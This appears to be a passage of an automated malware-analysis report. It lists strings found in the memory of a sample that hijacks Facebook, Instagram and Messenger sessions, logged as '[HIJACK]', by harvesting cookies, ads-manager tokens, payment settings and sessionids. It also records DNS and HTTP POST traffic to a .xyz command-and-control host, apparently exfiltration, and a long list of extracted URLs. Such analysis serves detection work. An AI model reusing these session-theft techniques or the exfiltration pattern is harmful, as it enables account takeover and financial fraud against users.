Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe	String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp	String found in binary or memory: 13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale":"en","description":"","icons":{"128":"128.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDC/HotmFlyuz5FaHaIbVBhhL4BwbcUtsfWwzgUMpZt5ZsLB2nW/Y5xwNkkPANYGdVsJkT2GPpRRIKBO5QiJ7jPMa3EZtcZHpkygBlQLSjMhdrAKevpKgIl6YTkwzNvExY6rzVDzeE9zqnIs33eppY4S5QcoALMxuSWlMKqgFQjHQIDAQAB","manifest_version":2,"name":"YouTube","update_url":"http://clients2.google.com/service/update2/crx","version":"4.2.8"},"page_ordinal":"n","path":"blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false},"felcaaldnbdncclmgdcncolpebgiejap":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"yn","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951495844949","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"1083656409722","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit spreadsheets","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC0AHrkP4MHPDKQI/O9LqZjtM24hKApaT3uVHeOduC06ZXWuwVRvx2wy5JUmMHfefXRG26tErgZSWpbxkm+2xfplKnT+grXF771HDgsNrNXERJHq7tnoYsWRiG3Gbs5BI4Ei+naZ/nyiWblbT4GyuD9N5yXNtoM0AnK+0FYhbO7IwIDAQAB","manifest_version":2,"name":"Sheets","offline_enabled":true,"update_url":"https://clients2.google.com/service/update2/crx","version":"1.2"},"page_ordinal":"n","path":"felcaaldnbdncclmgdcncolpebgiejap\\1.2_0","preferences":{},"regular_only_preferences":{},"state":1,"was_installed_by_default":true,"was_installed_by_oem":false,"withholding_permissions":false},"gfdkimpbcpahaombhbimeihdjnejgicl":{"active_permissions":{"api":["feedbackPrivate"],"explicit_host":["chrome://resources/"],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":["feedbackPrivate.onFeedbackRequested"],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951485617462","location":5,"manifest":{"app":{"background":{"scripts":["js/event_handler.js"]},"content_security_policy":"default-src 'none'; script-src 'self' blob: filesystem: chrome://resources; style-src 'unsafe-inline' blob: chrome: file: filesystem: data: ; img-src * blob: chrome: file: filesystem: data:; media-src 'self' blob: filesystem:"},"description":"Send feedback to Google","display_in_launcher":false,"display_in_new_tab_page":false,"icons":{"192":"images/icon192
Source: 56BB1610C0318054.exe	String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe	String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 84cfba021a5a6662.xyz

Source: unknown

HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz

Source: 56BB1610C0318054.exe, 00000004.00000003.259407630.0000000002F51000.00000004.00000001.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 1611971443428.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611971443428.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611971443428.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exe	String found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: http://docs.google.com/x
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 56BB1610C0318054.exe	String found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_use
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
